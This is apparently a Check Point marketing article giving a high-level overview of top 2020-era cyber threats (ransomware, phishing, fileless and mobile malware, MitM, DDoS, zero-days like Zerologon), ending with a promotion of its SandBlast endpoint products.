The cyber threat landscape is constantly evolving. As cyberattackers become more skilled and organized, their attacks are becoming more sophisticated as well.
Today, organizations face generation V and VI cyber threats. These attackers are aware of the improvements made in enterprise cybersecurity in recent years and have tailored their attacks to bypass and overcome traditional defenses. The modern cyber attack is multi-vector and uses polymorphic code to evade detection. As a result, threat detection and response is more difficult than ever before.
To add to the challenge, many organizations are facing a sudden and dramatic shift in how they perform “business as usual”. The COVID-19 pandemic drove many organizations to adopt a mostly or wholly remote workforce, often without adequate preparation. For organizations whose security strategy depended on employees working from the office, adapting to this new way of life is a challenge.
In the remote work world, the endpoint is cybercriminals’ primary target and an organization’s first line of defense. Securing the remote workforce requires that organizations understand the top cyber threats their employees face and have endpoint security solutions in place that are capable of detecting, preventing, and remediating these attacks.
Cybercriminals are constantly innovating, and the top cyber threats that organizations face change regularly as attackers adapt to changing circumstances. Check Point Research continually tracks the trends and changes in the cyber threat landscape, and the following are the threats organizations should currently be most concerned about.
Ransomware is malware designed to use encryption to force the target of the attack to pay a ransom demand. Once present on the system, the malware encrypts the user’s files and demands payment in exchange for the decryption key. Since modern encryption algorithms are unbreakable with the technology available, the only way to recover the encrypted files is to restore the data from a backup (if available) or to pay the random demand.
Ransomware has become one of the most visible and prolific types of malware, and the COVID-19 pandemic provided an environment in which this type of malware has thrived. In recent years, some ransomware variants have also evolved to perform “double extortion” attacks. Maze, Sodinokibi/REvil, DopplelPaymer, Nemty, and other ransomware variants steal copies of files before encryption, threatening to breach them if the user refuses to pay the ransom demand. While this trend began in late 2019 with Maze, it has continued to grow as more groups adopted it throughout 2020.
Ransomware is a type of malware but far from the only type. Malware comes in a variety of different forms and can be used to achieve a number of different objectives. Malware variants may be designed to do anything from collecting and stealing sensitive information to presenting unwanted ads to causing permanent damage to an infected machine.
The most common types of malware vary from one year to another as different types of attacks become more or less profitable to attackers. In 2020, the most common forms of malware included:
While the list of the “top six” types of malware remains constant worldwide, the percentage of malware of each type varies from one geographic region to another.
For example, as described in Check Point’s Cyber Attack Trends: 2020 Mid-Year Report, the EMEA region is the only one where botnet malware is more common than malware targeting mobile devices. Across other regions, the rankings remain constant but the relative percentages can vary.
Antivirus solutions commonly attempt to detect malware on a device by inspecting each file on the device for signs of malicious content. Fileless malware attempts to bypass this approach to threat detection by not using a file. Instead, the malware is implemented as a set of commands to functions that are built into the infected computer. This enables the malware to achieve the same objectives, but can make it harder to detect for some defensive solutions.
The main differentiator of fileless malware is its lack of files; it performs many of the same functions as traditional malware. For example, FritzFrog – a fileless peer-to-peer (P2P) botnet malware detected in August 2020 – is designed to infect systems and mine cryptocurrency.
Phishing is one of the most common methods that attackers use to gain access to a target system. Often, it is easier to trick a user into clicking on a malicious link or opening an attachment than it is to locate and successfully exploit a vulnerability in an organization’s network. Phishing attacks can achieve a variety of goals, including credential theft, malware delivery, financial fraud, and theft of sensitive data.
Phishing has historically been the most common method for cyberattackers to launch a campaign due to its ease of use and high success rate. During the COVID-19 pandemic, this trend only accelerated as cybercriminals took advantage of employees working from outside the office and the climate of uncertainty regarding the virus.
The COVID-19 pandemic also amplified the effect of common phishing lures. For example, Black Friday and Cyber Monday are a commonly exploited pretext for phishers, and the rise in online shopping due to COVID-19 made it especially effective in 2020. As a result, the volume of phishing emails doubled in the weeks leading up to Black Friday and Cyber Monday compared to the beginning of the previous month.
Many network protocols are protected against eavesdroppers by encryption, which makes the traffic impossible to read. A Man-in-the-Middle (MitM) attack bypasses these protections by breaking a connection into two pieces. By creating a separate, encrypted connection with the client and the server, an attacker can read the data sent over the connection and modify it as desired before forwarding it on to its destination.
MitM attacks can be defeated using protocols like HTTPS. However, the rise of mobile makes this a more dangerous attack vector. Mobile apps provide little or no visibility to their users regarding their network connections and may be using insecure protocols for communication that are vulnerable to MitM attacks.
Many organizations focus their cybersecurity efforts on computers, but mobile devices are a growing threat to an organization’s cybersecurity. As employees increasingly use mobile devices to do their work and access sensitive company data, malicious mobile applications are increasingly dangerous. These applications can do anything that desktop malware can, including stealing sensitive data, encrypting files with ransomware, and more.
In 2020, mobile malware was the second most common type of malware worldwide. The most common mobile malware variants – including xHelper, PreAMo, and Necro – are all Trojans with additional functionality, including ad fraud and click fraud. Mobile malware commonly takes advantage of vulnerabilities in mobile operating systems, like the remote code execution (RCE) vulnerability fixed in a batch of 43 Android security patches in January 2021.
Organizations’ IT infrastructure and services – like web applications, email, etc. – are critical to their ability to do business. Denial of Service (DoS) attacks are designed to deny access to critical services. This can be accomplished by exploiting a vulnerability in an application (causing it to crash) or by flooding a system with more data or requests than it is able to manage (rendering it unable to handle legitimate requests). In some cases, attackers will perform a ransom DoS attack where a ransom payment is demanded to either stop an ongoing attack or prevent a threatened one.
During the remote work and learning driven by the COVID-19 pandemic, remote access solutions were a major target of DoS attacks. And during the 2020-2021 school year, Distributed DoS (DDoS) attacks against the education sector increased dramatically. These attacks attempted to render remote learning services unusable or solicited ransoms to prevent or stop the attacks.
Software contains weaknesses and vulnerabilities, and many of these vulnerabilities reach production, where they are potentially exploitable by attackers. These production vulnerabilities are discovered internally at the company, by external security researchers, or by cyberattackers.
In the third case, the cyberattackers can exploit these “zero day” vulnerabilities in the system. Until the organization manages to patch the vulnerability – rendering it safe – all users of the system are potentially vulnerable to attack.
In 2020, one of the most famous zero-day vulnerabilities was Zerologon, which affected Windows Domain Controllers (DCs). Attackers who exploited this vulnerability could gain complete control over the network managed by the vulnerable DC. Cybercriminals were actively exploiting this vulnerability before many organizations patched it, prompting emergency security directives from the US government for government agencies to apply the patch immediately.
This list of top threats is not exhaustive and does not cover all active threats to enterprise cybersecurity. Examples of other common cybersecurity threats include:
While these potential attacks do not make the list of the most common and dangerous cyber threats, they still pose a significant risk. Enterprise security solutions should include the ability to detect, prevent, and remediate attacks using these vectors as well.
Enterprise cybersecurity has grown more difficult with the surge in remote work driven by COVID-19. Instead of a mostly on-site workforce, security teams now need to protect employees working from home (potentially on personally-owned devices).
These systems connected directly to personal networks and the public Internet are more vulnerable to attack. As a result, endpoint security – on computers and mobile devices alike – is an even greater priority for enterprise cybersecurity than before.
With the wide range of potential cybersecurity threats, organizations require an endpoint detection and response solution capable of detecting and protecting all of their employees’ devices against top cyber threats. To learn about the features that you should be looking for in an endpoint security platform, check out these buyer’s guides for endpoint protection and mobile device security.
Check Point SandBlast Agent and SandBlast Mobile offer comprehensive endpoint & mobile protection for an organization’s entire remote workforce. This includes protection against malware, web-based attacks, and other top cybersecurity risks. To see for yourself how Check Point SandBlast Agent and SandBlast Mobile can protect your organization against cyber threats, request a free demo.